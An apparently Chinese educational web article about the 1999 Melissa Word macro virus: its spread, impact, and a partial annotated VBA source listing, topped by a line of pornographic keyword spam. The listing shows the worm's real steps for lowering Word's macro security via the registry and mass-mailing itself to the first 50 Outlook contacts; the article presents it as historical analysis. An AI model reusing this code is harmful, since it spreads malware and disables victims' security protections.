不卡AV在线|网页在线观看无码高清|亚洲国产亚洲国产|国产伦精品一区二区三区免费视频

學(xué)習(xí)啦>學(xué)習(xí)電腦>電腦安全>病毒知識>

電腦病毒梅麗莎基本介紹

時間: 林輝766 分享

  世界第二電腦病毒梅麗莎,,破壞性也極強,歐美大部分國家都受到了沖擊!學(xué)習(xí)啦小編下面為大家詳細(xì)的介紹下梅麗莎病毒!

  梅利莎(Melissa)

  1999年3月27日,一種隱蔽性、傳播性極大的、名為Melissa(又名“美麗殺手”)的WORD97、WORD2000宏病毒出現(xiàn)在網(wǎng)上,并以幾何級數(shù)的速度在因特網(wǎng)上飛速傳播,僅在一天之內(nèi)就感染了全球數(shù)百萬臺計算機,引發(fā)了一場前所未有的“病毒風(fēng)暴”。

  Melissa病毒最初是在一個成人新聞組里出現(xiàn),并為來訪用戶提供色情網(wǎng)站清單及其訪問密碼。 這個病毒專門針對微軟的電子郵件服務(wù)器和電子郵件收發(fā)軟件,它隱藏在一個WORD97格式的文件里,以附件的方式通過電子郵件傳播,善于侵襲裝有WORD97或WORD2000的計算機。它可以攻擊WORD97的注冊器并修改其預(yù)防宏病毒的安全設(shè)置,使它感染的文件所具有的宏病毒預(yù)警功能喪失作用。當(dāng)打開感染了該病毒的wORD97、WORD2000文檔時,該病毒首先感染通用模板:Nor_mal.DOT文件,并修改Windows注冊表項:HKEY_CURRENTUSER\Software\Microsoft\Office,將其增加表項: Melis_sa?,并給其賦值為:…by Kwyjibo,在OUTLOOK電子郵件程序啟動的情況下,將自動給地址簿的前50名發(fā)送信件, 該信件的主題是:“Important Message From ,該用戶名為地址簿里的已經(jīng)存放的用戶名, 信件的內(nèi)容是:Here is that document you asked for...don'show anyone else;-),并將該信件附加一個帶毒文件,名為:list.DOC,該文檔包含大量色情網(wǎng)址。

  由于是熟悉的人發(fā)送的,因此容易被人們忽視。同時,該病毒還會自動重復(fù)以上的動作,由此連鎖反應(yīng),會在短時間內(nèi),造成郵件服務(wù)器的大量阻塞,直至“淹沒”電子郵件服務(wù)器,嚴(yán)重影響人們的正常網(wǎng)絡(luò)通訊。據(jù)計算,如果Mel_issa能夠按照理論上的速度傳播,只需5次就可以讓全世界所有的網(wǎng)絡(luò)用戶都收到一份。 由于病毒自動進(jìn)行自我復(fù)制,因而屬于蠕蟲類病毒。Melissa的作者顯然對此頗為得意,他在病毒代碼中寫道:“蠕蟲類?宏病毒?WORD97病毒? 還是WORD2000病毒?您們自己看著辦吧!”

  在發(fā)現(xiàn)Melissa病毒后短短的數(shù)小時內(nèi),該病毒即通過因特網(wǎng)在全球傳染數(shù)百萬臺計算機和數(shù)萬臺服務(wù)器, 因特網(wǎng)在許多地方癱瘓。美國YAHOO、美國在線AOL幾個大型網(wǎng)站公司,因為Melissa堵塞了他們的郵件服務(wù)系統(tǒng), 迫使他們不能收信,也不能發(fā)信,許多公司技術(shù)人員放棄了他們的周未,以應(yīng)付這個Melissa病毒所帶來的意外情況,甚至像微軟、朗訊、英特爾、Motorola這樣的技術(shù)公司及數(shù)十所大學(xué)也不例外。對此,美國聯(lián)邦調(diào)查局、美國國家設(shè)施保護(hù)中心有史以來第二次向全國發(fā)出緊急通告,我國中央電視臺也數(shù)次報道。因特網(wǎng)是沒有國界的,這種病毒也已威脅到我國網(wǎng)絡(luò)安全,現(xiàn)在國內(nèi)用戶已有感染。

  Melissa最令人恐怖之處,還不在于“癱瘓”郵件服務(wù)器,而是大量涉及企業(yè)和政府的核心機密有可能通過電子郵件的反復(fù)傳遞而擴散出去,甚至受損害用戶連機密被擴散到了哪里都不知道。由此看來,Melissa較之 1988年談

  之色變的“莫里斯蠕蟲病毒”,和1998年的“BO黑客程序”,更加險惡。

  梅利莎病毒的源代碼:

  部分源代碼

  下面是梅利莎病毒的部分關(guān)鍵源代碼:

  Private Sub Document_Open()

  On Error Resume Next

  If System.PrivateProfileString(“”, “HKEY_CURRENT_USER\Software\Microsoft\Office.0\Word\Security”,“Level”) <> “”Then

  CommandBars(“Macro”).Controls(“Security...”).Enabled = False

  //降低Word的安全級別,使打開含有該病毒的文件時Word不報警

  System.PrivateProfileString(“”, “HKEY_CURRENT_USER\Software\Microsoft\Office.0\Word\Security”, “Level”) = 1&

  Else

  CommandBars(“Tools”).Controls(“Macro”).Enabled = False

  //使Word的宏菜單上沒有編輯宏的可能

  ……

  End If

  Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice

  //搜索要感染對象的E-Mail地址,并形成感染郵件,目前這一技術(shù)被網(wǎng)絡(luò)蠕蟲廣泛利用。

  Set UngaDasOutlook = CreateObject(“Outlook.Application”)

  Set DasMapiName = UngaDasOutlook.GetNameSpace(“MAPI”)

  If System.PrivateProfileString(“”, “HKEY_CURRENT_USER\Software\Microsoft\Office\”, “Melissa?”) <> “... by Kwyjibo” Then

  If UngaDasOutlook = “Outlook” Then

  DasMapiName.Logon “profile”, “password”

  For y = 1 To DasMapiName.AddressLists.Count

  Set AddyBook=DasMapiName.AddressLists(y)

  x = 1

  Set BreakUmOffASlice=UngaDasOutlook.CreateItem(0)

  For oo = 1 To AddyBook.AddressEntries.Count

  Peep = AddyBook.AddressEntries(x)

  BreakUmOffASlice.Recipients.Add Peep

  x = x + 1

  If x > 50 Then oo = AddyBook.AddressEntries.Count //發(fā)送50個信件

  Next oo

  BreakUmOffASlice.Subject = “Important Message From ”& Application.UserName // 感染病毒的信件主題

  BreakUmOffASlice.Body = “Here is that document you asked for ... don’t show anyone else ;-)”

  //信件的主體

  BreakUmOffASlice.Attachments.Add ActiveDocument.FullName //病毒信件的附件

  BreakUmOffASlice.Send // 發(fā)送

  Peep =“”

  Next y

  DasMapiName.Logoff

  End If

  System.PrivateProfileString(“”, “HKEY_CURRENT_USER\Software\Microsoft\Office\”,“Melissa?”) = “... by Kwyjibo”

  End If

  //以下代碼感染W(wǎng)ord的模板文件或通過染毒的模板文件感染新的Word文檔


看了此文電腦病毒梅麗莎基本介紹的人還看了:

1.典型計算機病毒的相關(guān)介紹

2.著名的十大計算機病毒2016

3.電腦病毒蟲介紹

4.大電腦病毒有哪些

5.電腦病毒的發(fā)展歷程及過程

585961